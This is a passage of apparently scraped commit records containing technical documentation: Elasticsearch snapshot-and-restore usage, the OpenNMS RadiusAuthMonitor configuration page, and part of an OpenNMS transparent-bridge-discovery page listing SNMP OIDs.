This location (or one of its parent directories) must be registered in the `path.repo`\nsetting on all master and data nodes.\n\nAssuming that the shared filesystem is mounted to `\/mount\/backups\/my_backup`, the following setting should be added to\n`elasticsearch.yml` file:\n\n[source,yaml]\n--------------\npath.repo: [\"\/mount\/backups\", \"\/mount\/longterm_backups\"]\n--------------\n\nThe `path.repo` setting supports Microsoft Windows UNC paths as long as at least server name and share are specified as\na prefix and back slashes are properly escaped:\n\n[source,yaml]\n--------------\npath.repo: [\"\\\\\\\\MY_SERVER\\\\Snapshots\"]\n--------------\n\nAfter all nodes are restarted, the following command can be used to register the shared file system repository with\nthe name `my_backup`:\n\n[source,js]\n-----------------------------------\n$ curl -XPUT 'http:\/\/localhost:9200\/_snapshot\/my_backup' -d '{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"\/mount\/backups\/my_backup\",\n \"compress\": true\n }\n}'\n-----------------------------------\n\nIf the repository location is specified as a relative path this path will be resolved against the first path specified\nin `path.repo`:\n\n[source,js]\n-----------------------------------\n$ curl -XPUT 'http:\/\/localhost:9200\/_snapshot\/my_backup' -d '{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup\",\n \"compress\": true\n }\n}'\n-----------------------------------\n\nThe following settings are supported:\n\n[horizontal]\n`location`:: Location of the snapshots. Mandatory.\n`compress`:: Turns on compression of the snapshot files. Compression is applied only to metadata files (index mapping and settings). Data files are not compressed. Defaults to `true`.\n`chunk_size`:: Big files can be broken down into chunks during snapshotting if needed. The chunk size can be specified in bytes or by\n using size value notation, i.e. 1g, 10m, 5k. Defaults to `null` (unlimited chunk size).\n`max_restore_bytes_per_sec`:: Throttles per node restore rate. Defaults to `40mb` per second.\n`max_snapshot_bytes_per_sec`:: Throttles per node snapshot rate. Defaults to `40mb` per second.\n`readonly`:: Makes repository read-only. Defaults to `false`.\n\n[float]\n===== Read-only URL Repository\n\nThe URL repository (`\"type\": \"url\"`) can be used as an alternative read-only way to access data created by the shared file\nsystem repository. The URL specified in the `url` parameter should point to the root of the shared filesystem repository.\nThe following settings are supported:\n\n[horizontal]\n`url`:: Location of the snapshots. Mandatory.\n\nURL Repository supports the following protocols: \"http\", \"https\", \"ftp\", \"file\" and \"jar\". URL repositories with `http:`,\n`https:`, and `ftp:` URLs has to be whitelisted by specifying allowed URLs in the `repositories.url.allowed_urls` setting.\nThis setting supports wildcards in the place of host, path, query, and fragment. 
For example:\n\n[source,yaml]\n-----------------------------------\nrepositories.url.allowed_urls: [\"http:\/\/www.example.org\/root\/*\", \"https:\/\/*.mydomain.com\/*?*#*\"]\n-----------------------------------\n\nURL repositories with `file:` URLs can only point to locations registered in the `path.repo` setting similar to\nshared file system repository.\n\n[float]\n===== Repository plugins\n\nOther repository backends are available in these official plugins:\n\n* {plugins}\/repository-s3.html[repository-s3] for S3 repository support\n* {plugins}\/repository-hdfs.html[repository-hdfs] for HDFS repository support in Hadoop environments\n* {plugins}\/repository-azure.html[repository-azure] for Azure storage repositories\n* {plugins}\/repository-gcs.html[repository-gcs] for Google Cloud Storage repositories\n\n[float]\n===== Repository Verification\nWhen a repository is registered, it's immediately verified on all master and data nodes to make sure that it is functional\non all nodes currently present in the cluster. The `verify` parameter can be used to explicitly disable the repository\nverification when registering or updating a repository:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/s3_repository?verify=false\n{\n \"type\": \"s3\",\n \"settings\": {\n \"bucket\": \"my_s3_bucket\",\n \"region\": \"eu-west-1\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe verification process can also be executed manually by running the following command:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/s3_repository\/_verify\n-----------------------------------\n\/\/ CONSOLE\n\nIt returns a list of nodes where repository was successfully verified or an error message if verification process failed.\n\n[float]\n=== Snapshot\n\nA repository can contain multiple snapshots of the same cluster. Snapshots are identified by unique names within the\ncluster. A snapshot with the name `snapshot_1` in the repository `my_backup` can be created by executing the following\ncommand:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1?wait_for_completion=true\n-----------------------------------\n\/\/ CONSOLE\n\nThe `wait_for_completion` parameter specifies whether or not the request should return immediately after snapshot\ninitialization (default) or wait for snapshot completion. During snapshot initialization, information about all\nprevious snapshots is loaded into the memory, which means that in large repositories it may take several seconds (or\neven minutes) for this command to return even if the `wait_for_completion` parameter is set to `false`.\n\nBy default a snapshot of all open and started indices in the cluster is created. This behavior can be changed by\nspecifying the list of indices in the body of the snapshot request.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": false\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe list of indices that should be included into the snapshot can be specified using the `indices` parameter that\nsupports <<search-multi-index-type,multi index syntax>>. The snapshot request also supports the\n`ignore_unavailable` option. Setting it to `true` will cause indices that do not exist to be ignored during snapshot\ncreation. 
By default, when `ignore_unavailable` option is not set and an index is missing the snapshot request will fail.\nBy setting `include_global_state` to false it's possible to prevent the cluster global state to be stored as part of\nthe snapshot. By default, the entire snapshot will fail if one or more indices participating in the snapshot don't have\nall primary shards available. This behaviour can be changed by setting `partial` to `true`.\n\nThe index snapshot process is incremental. In the process of making the index snapshot Elasticsearch analyses\nthe list of the index files that are already stored in the repository and copies only files that were created or\nchanged since the last snapshot. That allows multiple snapshots to be preserved in the repository in a compact form.\nSnapshotting process is executed in non-blocking fashion. All indexing and searching operation can continue to be\nexecuted against the index that is being snapshotted. However, a snapshot represents the point-in-time view of the index\nat the moment when snapshot was created, so no records that were added to the index after the snapshot process was started\nwill be present in the snapshot. The snapshot process starts immediately for the primary shards that has been started\nand are not relocating at the moment. Before version 1.2.0, the snapshot operation fails if the cluster has any relocating or\ninitializing primaries of indices participating in the snapshot. Starting with version 1.2.0, Elasticsearch waits for\nrelocation or initialization of shards to complete before snapshotting them.\n\nBesides creating a copy of each index the snapshot process can also store global cluster metadata, which includes persistent\ncluster settings and templates. The transient settings and registered snapshot repositories are not stored as part of\nthe snapshot.\n\nOnly one snapshot process can be executed in the cluster at any time. While snapshot of a particular shard is being\ncreated this shard cannot be moved to another node, which can interfere with rebalancing process and allocation\nfiltering. Elasticsearch will only be able to move a shard to another node (according to the current allocation\nfiltering settings and rebalancing algorithm) once the snapshot is finished.\n\nOnce a snapshot is created information about this snapshot can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nSimilar as for repositories, information about multiple snapshots can be queried in one go, supporting wildcards as well:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_*,some_other_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\nAll snapshots currently stored in the repository can be listed using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_all\n-----------------------------------\n\/\/ CONSOLE\n\nThe command fails if some of the snapshots are unavailable. 
The boolean parameter `ignore_unavailable` can be used to\nreturn all snapshots that are currently available.\n\nA currently running snapshot can be retrieved using the following command:\n\n[source,sh]\n-----------------------------------\n$ curl -XGET \"localhost:9200\/_snapshot\/my_backup\/_current\"\n-----------------------------------\n\nA snapshot can be deleted from the repository using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nWhen a snapshot is deleted from a repository, Elasticsearch deletes all files that are associated with the deleted\nsnapshot and not used by any other snapshots. If the deleted snapshot operation is executed while the snapshot is being\ncreated the snapshotting process will be aborted and all files created as part of the snapshotting process will be\ncleaned. Therefore, the delete snapshot operation can be used to cancel long running snapshot operations that were\nstarted by mistake.\n\nA repository can be deleted using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nWhen a repository is deleted, Elasticsearch only removes the reference to the location where the repository is storing\nthe snapshots. The snapshots themselves are left untouched and in place.\n\n[float]\n=== Restore\n\nA snapshot can be restored using the following command:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n-----------------------------------\n\/\/ CONSOLE\n\nBy default, all indices in the snapshot are restored, and the cluster state is\n*not* restored. It's possible to select indices that should be restored as well\nas to allow the global cluster state from being restored by using `indices` and\n`include_global_state` options in the restore request body. The list of indices\nsupports <<search-multi-index-type,multi index syntax>>. The `rename_pattern`\nand `rename_replacement` options can be also used to rename indices on restore\nusing regular expression that supports referencing the original text as\nexplained\nhttp:\/\/docs.oracle.com\/javase\/6\/docs\/api\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[here].\nSet `include_aliases` to `false` to prevent aliases from being restored together\nwith associated indices\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": true,\n \"rename_pattern\": \"index_(.+)\",\n \"rename_replacement\": \"restored_index_$1\"\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe restore operation can be performed on a functioning cluster. However, an\nexisting index can be only restored if it's <<indices-open-close,closed>> and\nhas the same number of shards as the index in the snapshot. The restore\noperation automatically opens restored indices if they were closed and creates\nnew indices if they didn't exist in the cluster. If cluster state is restored\nwith `include_cluster_state` (defaults to `false`), the restored templates that\ndon't currently exist in the cluster are added and existing templates with the\nsame name are replaced by the restored templates. 
The restored persistent\nsettings are added to the existing persistent settings.\n\n[float]\n==== Partial restore\n\nBy default, the entire restore operation will fail if one or more indices participating in the operation don't have\nsnapshots of all shards available. It can occur if some shards failed to snapshot for example. It is still possible to\nrestore such indices by setting `partial` to `true`. Please note, that only successfully snapshotted shards will be\nrestored in this case and all missing shards will be recreated empty.\n\n\n[float]\n==== Changing index settings during restore\n\nMost of index settings can be overridden during the restore process. For example, the following command will restore\nthe index `index_1` without creating any replicas while switching back to default refresh interval:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1\",\n \"index_settings\": {\n \"index.number_of_replicas\": 0\n },\n \"ignore_index_settings\": [\n \"index.refresh_interval\"\n ]\n}\n-----------------------------------\n\/\/ CONSOLE\n\nPlease note, that some settings such as `index.number_of_shards` cannot be changed during restore operation.\n\n[float]\n==== Restoring to a different cluster\n\nThe information stored in a snapshot is not tied to a particular cluster or a cluster name. Therefore it's possible to\nrestore a snapshot made from one cluster into another cluster. All that is required is registering the repository\ncontaining the snapshot in the new cluster and starting the restore process. The new cluster doesn't have to have the\nsame size or topology. However, the version of the new cluster should be the same or newer (only 1 major version newer) than the cluster that was used to create the snapshot. For example, you can restore a 1.x snapshot to a 2.x cluster, but not a 1.x snapshot to a 5.x cluster.\n\nIf the new cluster has a smaller size additional considerations should be made. First of all it's necessary to make sure\nthat new cluster have enough capacity to store all indices in the snapshot. It's possible to change indices settings\nduring restore to reduce the number of replicas, which can help with restoring snapshots into smaller cluster. It's also\npossible to select only subset of the indices using the `indices` parameter. Prior to version 1.5.0 elasticsearch\ndidn't check restored persistent settings making it possible to accidentally restore an incompatible\n`discovery.zen.minimum_master_nodes` setting, and as a result disable a smaller cluster until the required number of\nmaster eligible nodes is added. Starting with version 1.5.0 incompatible settings are ignored.\n\nIf indices in the original cluster were assigned to particular nodes using\n<<shard-allocation-filtering,shard allocation filtering>>, the same rules will be enforced in the new cluster. Therefore\nif the new cluster doesn't contain nodes with appropriate attributes that a restored index can be allocated on, such\nindex will not be successfully restored unless these index allocation settings are changed during restore operation.\n\n[float]\n=== Snapshot status\n\nA list of currently running snapshots with their detailed status information can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nIn this format, the command will return information about all currently running snapshots. 
By specifying a repository name, it's possible\nto limit the results to a particular repository:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nIf both repository name and snapshot id are specified, this command will return detailed status information for the given snapshot even\nif it's not currently running:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nMultiple ids are also supported:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1,snapshot_2\/_status\n-----------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Monitoring snapshot\/restore progress\n\nThere are several ways to monitor the progress of the snapshot and restores processes while they are running. Both\noperations support `wait_for_completion` parameter that would block client until the operation is completed. This is\nthe simplest method that can be used to get notified about operation completion.\n\nThe snapshot operation can be also monitored by periodic calls to the snapshot info:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nPlease note that snapshot info operation uses the same resources and thread pool as the snapshot operation. So,\nexecuting a snapshot info operation while large shards are being snapshotted can cause the snapshot info operation to wait\nfor available resources before returning the result. On very large shards the wait time can be significant.\n\nTo get more immediate and complete information about snapshots the snapshot status command can be used instead:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nWhile snapshot info method returns only basic information about the snapshot in progress, the snapshot status returns\ncomplete breakdown of the current state for each shard participating in the snapshot.\n\nThe restore process piggybacks on the standard recovery mechanism of the Elasticsearch. As a result, standard recovery\nmonitoring services can be used to monitor the state of restore. When restore operation is executed the cluster\ntypically goes into `red` state. It happens because the restore operation starts with \"recovering\" primary shards of the\nrestored indices. During this operation the primary shards become unavailable which manifests itself in the `red` cluster\nstate. Once recovery of primary shards is completed Elasticsearch is switching to standard replication process that\ncreates the required number of replicas at this moment cluster switches to the `yellow` state. Once all required replicas\nare created, the cluster switches to the `green` states.\n\nThe cluster health operation provides only a high level status of the restore process. It\u2019s possible to get more\ndetailed insight into the current state of the recovery process by using <<indices-recovery, indices recovery>> and\n<<cat-recovery, cat recovery>> APIs.\n\n[float]\n=== Stopping currently running snapshot and restore operations\n\nThe snapshot and restore framework allows running only one snapshot or one restore operation at a time. 
\n\n[float]\n=== Stopping currently running snapshot and restore operations\n\nThe snapshot and restore framework allows running only one snapshot or one restore operation at a time. If a currently\nrunning snapshot was executed by mistake, or takes unusually long, it can be terminated using the snapshot delete operation.\nThe snapshot delete operation checks if the deleted snapshot is currently running and, if it is, stops\nthat snapshot before deleting the snapshot data from the repository.\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nThe restore operation uses the standard shard recovery mechanism. Therefore, any currently running restore operation can\nbe canceled by deleting indices that are being restored. Please note that data for all deleted indices will be removed\nfrom the cluster as a result of this operation.\n\n[float]\n=== Effect of cluster blocks on snapshot and restore operations\nMany snapshot and restore operations are affected by cluster and index blocks. For example, registering and unregistering\nrepositories require write access to the global metadata. The snapshot operation requires that all indices and their metadata as\nwell as the global metadata be readable. The restore operation requires the global metadata to be writable; however,\nthe index-level blocks are ignored during restore because indices are essentially recreated during restore.\nPlease note that the content of a repository is not part of the cluster and therefore cluster blocks don't affect internal\nrepository operations such as listing or deleting snapshots from an already registered repository.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95d0e3954874d4fdd3cb6818a0c7ed261dbb115f","subject":"NMS-6700: Documentation RadiusAuthMonitor","message":"NMS-6700: Documentation RadiusAuthMonitor\n\n- improve summary\n- Fix toc depth\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/RadiusAuthMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/RadiusAuthMonitor.adoc","new_contents":"\n==== RadiusAuthMonitor\n\nThis monitor allows testing the functionality of the link:http:\/\/freeradius.org\/rfc\/rfc2865.html[RADIUS] authentication system.\nThe availability is tested by sending an _AUTH_ packet to the _RADIUS server_.\nIf a valid _ACCEPT_ response is received, the _RADIUS_ service is _up_ and considered available.\n\nIMPORTANT: To use this monitor it is required to install the _RADIUS_ protocol for OpenNMS.\n\n[source, bash]\n----\n{apt-get,yum} install opennms-plugin-protocol-radius\n----\n\nThe test is similar to testing the behavior of a _RADIUS_ server by evaluating the result with the command line tool `radtest`.\n\n[source, bash]\n----\nroot@vagrant:~# radtest \"John Doe\" hello 127.0.0.1 1812 radiuspassword\nSending Access-Request of id 49 to 127.0.0.1 port 1812\n\tUser-Name = \"John Doe\"\n\tUser-Password = \"hello\"\n\tNAS-IP-Address = 127.0.0.1\n\tNAS-Port = 1812\n\tMessage-Authenticator = 0x00000000000000000000000000000000\nrad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=49, length=37 <1>\n\tReply-Message = \"Hello, John Doe\"\n----\n<1> The `Access-Accept` message which is evaluated by the monitor.\n\n===== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.protocols.radius.monitor.RadiusAuthMonitor`\n| Remote Enabled | false\n|===\n\n===== Configuration and Usage\n\n.Monitor specific parameters 
for the RadiusAuthMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `timeout` | Time in milliseconds to wait for the _RADIUS_ service. | optional | `5000`\n| `retry` | Number of retries before the service is marked as unavailable. | optional | `0`\n| `authport` | _RADIUS_ authentication port. | optional | `1812`\n| `acctport` | _RADIUS_ accounting port. | optional | `1813`\n| `user` | Username to test the authentication. | optional | `OpenNMS`\n| `password` | Password to test the authentication. | optional | `OpenNMS`\n| `secret` | The _RADIUS_ shared secret used for communication between the _client\/NAS_\n and the _RADIUS_ server. | optional | `secret`\n| `authtype` | _RADIUS_ authentication type. The following authentication types are supported:\n `chap`, `pap`, `mschapv1`, `mschapv2`, `eapmd5`, `eapmschapv2` | optional | `pap`\n| `nasid` | The link:http:\/\/freeradius.org\/rfc\/rfc2865.html#NAS-Identifier[Network Access Server identifier]\n originating the _Access-Request_. | optional | `opennms`\n|===\n\n===== Examples\nExample configuration of the monitor in the `poller-configuration.xml` file.\n\n[source, xml]\n----\n<service name=\"Radius-Authentication\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"3\" \/>\n <parameter key=\"timeout\" value=\"3000\" \/>\n <parameter key=\"user\" value=\"John Doe\" \/>\n <parameter key=\"password\" value=\"hello\" \/>\n <parameter key=\"secret\" value=\"radiuspassword\" \/>\n <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\" \/>\n <parameter key=\"ds-name\" value=\"radiusauth\" \/>\n<\/service>\n\n<monitor service=\"Radius-Authentication\" class-name=\"org.opennms.protocols.radius.monitor.RadiusAuthMonitor\" \/>\n----\n","old_contents":"\n=== RadiusAuthMonitor\n\nThis monitor allows to test the functionality of the link:http:\/\/freeradius.org\/rfc\/rfc2865.html[RADIUS] service.\nThe availability is tested by sending an _AUTH_ packet to the host.\nIf a valid _ACCEPT_ response is received, then the _RADIUS_ service is _up_ and considered as available.\n\nIMPORTANT: To use this monitor it is required to install the _RADIUS_ protocol for OpenNMS.\n\n----\n{apt-get,yum} install opennms-plugin-protocol-radius\n----\n\nThe test is similar to test the behavior of a _RADIUS_ server by evaluating the result with the command line tool `radtest`.\n\n[source, bash]\n----\nroot@vagrant:~# radtest \"John Doe\" hello 127.0.0.1 1812 radiuspassword\nSending Access-Request of id 49 to 127.0.0.1 port 1812\n\tUser-Name = \"John Doe\"\n\tUser-Password = \"hello\"\n\tNAS-IP-Address = 127.0.0.1\n\tNAS-Port = 1812\n\tMessage-Authenticator = 0x00000000000000000000000000000000\nrad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=49, length=37 <1>\n\tReply-Message = \"Hello, John Doe\"\n----\n<1> The `Access-Accept` message which is evaluated by the monitor.\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.protocols.radius.monitor.RadiusAuthMonitor`\n| Remote Enabled | false\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the RadiusAuthMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `timeout` | Time in milliseconds to wait for the _RADIUS_ service. | optional | `5000`\n| `retry` | This is a placeholder for the second optional monitor parameter description. 
| optional | `0`\n| `authport` | _RADIUS_ authentication port. | optional | `1812`\n| `acctport` | _RADIUS_ accounting port. | optional | `1813`\n| `user` | Username to test the authentication | optional | `OpenNMS`\n| `password` | Password to test the authentication | optional | `OpenNMS`\n| `secret` | The _RADIUS_ shared secret used for communication between the _client\/NAS_\n and the _RADIUS_ server. | optional | `secret`\n| `authtype` | _RADIUS_ authentication type. The following authentication types are supported:\n `chap`, `pap`, `mschapv1`, `mschapv2`, `eapmd5`, `eapmschapv2` | optional | `pap`\n| `nasid` | The link:http:\/\/freeradius.org\/rfc\/rfc2865.html#NAS-Identifier[Network Access Server identifier]\n originating the _Access-Request_. | optional | `opennms`\n|===\n\n==== Examples\nExample configuration how to configure the monitor in the 'poller-configuration.xml'.\n\n[source, xml]\n----\n<service name=\"Radius-Authentication\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"3\" \/>\n <parameter key=\"timeout\" value=\"3000\" \/>\n <parameter key=\"user\" value=\"John Doe\" \/>\n <parameter key=\"password\" value=\"hello\" \/>\n <parameter key=\"secret\" value=\"radiuspassword\" \/>\n <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\" \/>\n <parameter key=\"ds-name\" value=\"radiusauth\" \/>\n<\/service>\n\n<monitor service=\"Radius-Authentication\" class-name=\"org.opennms.protocols.radius.monitor.RadiusAuthMonitor\" \/>\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ddc3eaed68e9c5505676f145c9693009e2529adb","subject":"changed an instance of MIB to OID in bridge-discovery.adoc","message":"changed an instance of MIB to OID in bridge-discovery.adoc","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/enlinkd\/layer-2\/bridge-discovery.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/enlinkd\/layer-2\/bridge-discovery.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/..\/images\n\n==== Transparent Bridge Discovery\n\nDiscovering _Layer 2_ network links using the _Bridge Forwarding_ table requires a special algorithm.\nTo discover _Links_, an algorithm based on the scientific paper link:http:\/\/cs-pub.bu.edu\/groups\/nrg\/readinglist\/lowekamp-sigcomm01.pdf[Topology Discovery for Large Ethernet Networks] is implemented.\nThe gathered information is used to classify _Links_ as _macLink_ or _bridgeLink_.\nA _macLink_ represents a _Link_ between a workstation or server identified by a MAC address.\nA _bridgeLink_ is a _connection_ between backbone ports.\n\nTransparent bridging is not loop free, so if the topology contains loops you have to enable the spanning tree protocol, which detects loops and puts some ports in a _blocking_ state to break them.\nTo get links, it is necessary to perform some calculations that let us define the _Links_.\nThe following _MIBs_ must be supported by the _SNMP agent_ to allow _Transparent Bridge Discovery_.\n\n.Supported OIDs from the Cisco-VTP MIB\n[options=\"header, autowidth\"]\n|===\n| Name | OID | Description\n| _vtpVersion_ | `.1.3.6.1.4.1.9.9.46.1.1.1.0` | The version of VTP in use on the local system.\n A device will report its version capability and not any particular version in use on the device.\n If the device does not 
support _VTP_, the version is _none(3)_.\n|===\n\n.Supported OIDs from the IP-MIB\n[options=\"header, autowidth\"]\n|===\n| Name | OID | Description\n| _ipNetToMediaIfIndex_ | `.1.3.6.1.2.1.4.22.1.1` | The interface on which this entry's equivalence is effective.\n The layer-2 interface identified by a particular value of this index is the same interface as identified by the same value of _ifIndex_.\n| _ipNetToMediaPhysAddress_ | `.1.3.6.1.2.1.4.22.1.2` | The media-dependent _physical_ address.\n| _ipNetToMediaNetAddress_ | `.1.3.6.1.2.1.4.22.1.3` | The _IpAddress_ corresponding to the media-dependent _physical_ address.\n| _ipNetToMediaType_ | `.1.3.6.1.2.1.4.22.1.4` | The type of mapping. Setting this object to the value _invalid(2)_ has the effect of invalidating the corresponding entry in the _ipNetToMediaTable_.\n That is, it effectively disassociates the interface identified with said entry from the mapping identified with said entry.\n It is an implementation-specific matter as to whether the agent removes an invalidated entry from the table.\n Accordingly, management stations must be prepared to receive tabular information from agents that corresponds to entries not currently in use.\n Proper interpretation of such entries requires examination of the relevant _ipNetToMediaType_ object.\n|===\n\n.Supported OIDs from the BRIDGE-MIB\n[options=\"header, autowidth\"]\n|===\n| Name | OID | Description\n| _dot1dBaseBridgeAddress_ | `.1.3.6.1.2.1.17.1.1.0` | The MAC address used by this bridge when it must be referred to in a unique fashion.\n It is recommended that this be the numerically smallest MAC address of all ports that belong to this bridge.\n However it is only required to be unique.\n When concatenated with _dot1dStpPriority_ a unique _BridgeIdentifier_ is formed which is used in the _Spanning Tree Protocol_.\n| _dot1dBaseNumPorts_ | `.1.3.6.1.2.1.17.1.2.0` | The number of ports controlled by this bridging entity.\n| _dot1dBaseType_ | `.1.3.6.1.2.1.17.1.3.0` | Indicates what type of bridging this bridge can perform.\n If a bridge is actually performing a certain type of bridging this will be indicated by entries in the port table for the given type.\n| _dot1dBasePort_ | `.1.3.6.1.2.1.17.1.4.1.1` | The port number of the port for which this entry contains bridge management information.\n| _dot1dPortIfIndex_ | `.1.3.6.1.2.1.17.1.4.1.2` | The value of the instance of the _ifIndex_ object, defined in _MIB-II_, for the interface corresponding to this port.\n| _dot1dStpProtocolSpecification_ | `.1.3.6.1.2.1.17.2.1.0` | An indication of what version of the Spanning Tree Protocol is being run.\n The value _decLb100(2)_ indicates the _DEC LANbridge 100 Spanning Tree protocol_.\n _IEEE 802.1d_ implementations will return _ieee8021d(3)_.\n If future versions of the _IEEE Spanning Tree Protocol_ are released that are incompatible with the current version a new value will be defined.\n| _dot1dStpPriority_ | `.1.3.6.1.2.1.17.2.2` | The value of the writeable portion of the _Bridge ID_, i.e., the first two octets of the (8 octet long) _Bridge ID_.\n The other (last) 6 octets of the _Bridge ID_ are given by the value of _dot1dBaseBridgeAddress_.\n| _dot1dStpDesignatedRoot_ | `.1.3.6.1.2.1.17.2.5` | The bridge identifier of the root of the spanning tree as determined by the _Spanning Tree Protocol_ as executed by this node.\n This value is used as the _Root Identifier_ parameter in all configuration _Bridge PDUs_ originated by this node.\n| _dot1dStpRootCost_ | `.1.3.6.1.2.1.17.2.6` | The cost 
of the path to the root as seen from this bridge.\n| _dot1dStpRootPort_ | `.1.3.6.1.2.1.17.2.7` | The port number of the port which offers the lowest cost path from this bridge to the root bridge.\n| _dot1dStpPort_ | `.1.3.6.1.2.1.17.2.15.1.1` | The port number of the port for which this entry contains Spanning Tree Protocol management information.\n| _dot1dStpPortPriority_ | `.1.3.6.1.2.1.17.2.15.1.2` | The value of the priority field which is contained in the first (in network byte order) octet of the (2 octet long) Port ID.\n The other octet of the Port ID is given by the value of _dot1dStpPort_.\n| _dot1dStpPortState_ | `.1.3.6.1.2.1.17.2.15.1.3` | The port's current state as defined by application of the _Spanning Tree Protocol_.\n This state controls what action a port takes on reception of a frame.\n If the bridge has detected a port that is malfunctioning it will place that port into the _broken(6)_ state.\n For ports which are disabled (see _dot1dStpPortEnable_), this object will have a value of _disabled(1)_.\n| _dot1dStpPortEnable_ | `.1.3.6.1.2.1.17.2.15.1.4` | The enabled\/disabled status of the port.\n| _dot1dStpPortPathCost_ | `.1.3.6.1.2.1.17.2.15.1.5` | The contribution of this port to the path cost of paths towards the spanning tree root which include this port.\n 802.1D-1990 recommends that the default value of this parameter be in inverse proportion to the speed of the attached LAN.\n| _dot1dStpPortDesignatedRoot_ | `.1.3.6.1.2.1.17.2.15.1.6` | The unique _Bridge Identifier_ of the _Bridge_ recorded as the _Root_ in the _Configuration BPDUs_ transmitted by the _Designated Bridge_ for the segment to which the port is attached.\n| _dot1dStpPortDesignatedCost_ | `.1.3.6.1.2.1.17.2.15.1.7` | The path cost of the _Designated Port_ of the segment connected to this port.\n This value is compared to the _Root Path Cost_ field in received bridge _PDUs_.\n| _dot1dStpPortDesignatedBridge_ | `.1.3.6.1.2.1.17.2.15.1.8` | The _Bridge Identifier_ of the bridge which this port considers to be the _Designated Bridge_ for this port's segment.\n| _dot1dStpPortDesignatedPort_ | `.1.3.6.1.2.1.17.2.15.1.9` | The _Port Identifier_ of the port on the _Designated Bridge_ for this port's segment.\n| _dot1dTpFdbAddress_ | `.1.3.6.1.2.1.17.4.3.1.1` | A unicast _MAC address_ for which the bridge has forwarding and\/or filtering information.\n| _dot1dTpFdbPort_ | `.1.3.6.1.2.1.17.4.3.1.2` | Either the value '0', or the port number of the port on which a frame having a source address equal to the value of the corresponding instance of _dot1dTpFdbAddress_ has been seen.\n A value of '0' indicates that the port number has not been learned but that the bridge does have some forwarding\/filtering information about this address (e.g. in the _dot1dStaticTable_).\n Implementors are encouraged to assign the port value to this object whenever it is learned even for addresses for which the corresponding value of _dot1dTpFdbStatus_ is not _learned(3)_.\n| _dot1dTpFdbStatus_ | `.1.3.6.1.2.1.17.4.3.1.3` | The status of this entry.\n The meanings of the values are: +\n *_other(1)_*: none of the following.\n This would include the case where some other _MIB_ object (not the corresponding instance of _dot1dTpFdbPort_, nor an entry in the 